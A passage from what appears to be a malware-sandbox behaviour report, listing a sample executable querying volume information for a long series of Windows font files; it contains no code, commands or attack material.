                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
Source: C:\Users\user\Desktop\tDb0ggawON.exe; Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
